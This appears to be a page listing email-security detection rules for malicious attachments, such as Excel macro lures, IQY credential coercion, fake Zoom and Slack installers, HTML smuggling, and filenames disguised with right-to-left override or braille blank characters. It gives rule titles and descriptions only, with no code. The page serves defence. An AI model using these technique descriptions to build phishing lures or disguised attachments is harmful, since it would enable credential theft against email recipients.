EXPLORE DETECTIONS
Attachment: Excel file with document sharing lure created by Go Excelize
Detects Excel macro files created with the Go Excelize library containing document sharing language such as 'sent document', 'shared file', or 'REVIEW DOCUMENT'. These files are often used as lures to trick users into enabling macros or downloading malicious content.
Attachment: Excel file with suspicious template identifier
Detects Excel attachments containing a specific template identifier (TM16390866) in the EXIF metadata, which may indicate malicious or suspicious document templates being used to distribute harmful content.
Attachment: Excel Web Query File (IQY)
Recursively scans files and archives to detect IQY files. Coercing a target user into providing credentials to an attacker-controlled web server, or for SMB relaying.
Attachment: Fake attachment image lure
Message (or attached message) contains an image impersonating an Outlook attachment button.
Attachment: Fake lawyer & sports agent identities
Detects messages containing attachments or content that reference known fake identities used in FC Barcelona scams, including fake lawyer Michael Gerardus Hermanus Demon and sports agents with the surname Giuffrida. The rule examines EXIF metadata, OCR text from attachments, and message body content for these specific identity markers.
Attachment: Fake scan-to-email
Message and attachment resemble an email from a scan-to-email service or device with credential theft language.
Attachment: Fake secure message and suspicious indicators
Body contains language resembling credential theft, and an attached "secure message" from an untrusted sender.
Attachment: Fake Slack installer
HTML attachment contains a Slack logo, request language, and a link to an executable. Observed in the wild.
Attachment: Fake voicemail via PDF
Identifies inbound messages containing a single-page PDF attachment related to voicemail or missed call notifications that includes either a URL or QR code.
Attachment: Fake Zoom installer
HTML attachment contains a Zoom logo, request language, and a link to an executable. Observed in the wild.
Attachment: Fictitious invoice using LinkedIn's address
Detects PDF attachments created with wkhtmltopdf or Qt that contain LinkedIn's headquarters address (1000 W Maude Ave) in financial communications context, but do not mention LinkedIn itself.
Attachment: File execution via Javascript
Javascript contains identifiers or strings that may attempt to execute files.
Attachment: Filename containing Unicode braille pattern blank character
Recursively identifies attachments that attempt to conceal their true file extension by using Braille Pattern Blank characters
Attachment: Filename containing Unicode right-to-left override character
Recursively identifies attachments that attempt to conceal their true file extension by using right-to-left override characters
Attachment: Finance themed PDF with observed phishing template
Detects PDF attachments containing a specific rectangular coordinate pattern at position [249.75 560 407.25 599.75], which may indicate a templated or malicious document structure.
Attachment: HTML attachment with Javascript location
Recursively scans files and archives to detect HTML smuggling techniques.
Attachment: HTML attachment with login portal indicators
Recursively scans files and archives to detect indicators of login portals implemented in HTML files. This is a known credential theft technique used by threat actors.
Attachment: HTML file contains exclusively Javascript
Attached HTML file does not contain any HTML other than a <script> block.
Attachment: HTML file with excessive 'const' declarations and abnormally long timeouts
Detects messages with HTML attachments containing multiple 'const' declarations while excluding legitimate Gmail messages. This is evidence of potential code injection or obfuscation techniques.
Attachment: HTML file with excessive padding and suspicious patterns
Attached HTML file contains excessive line breaks and suspicious Javascript patterns.
Attachment: HTML file with reference to recipient and suspicious patterns
Attached HTML file (or HTML file within an attached email) contains references to the recipients email address, indicative of credential phishing, and suspicious Javascript patterns.
Attachment: HTML smuggling - QR Code with suspicious links
This rule detects messages with HTML attachments containing QR codes
Attachment: HTML smuggling 'body onload' linking to suspicious destination
Potential HTML Smuggling. This rule inspects HTML attachments that contain a single link and leveraging an HTML body onload event. The linked domain must be in the URLhaus trusted repoters list, or have a suspicious TLD.
Attachment: HTML smuggling 'body onload' with high entropy and suspicious text
Potential HTML Smuggling. This rule inspects HTML attachments that contain "body unload", high entropy, and suspicious text.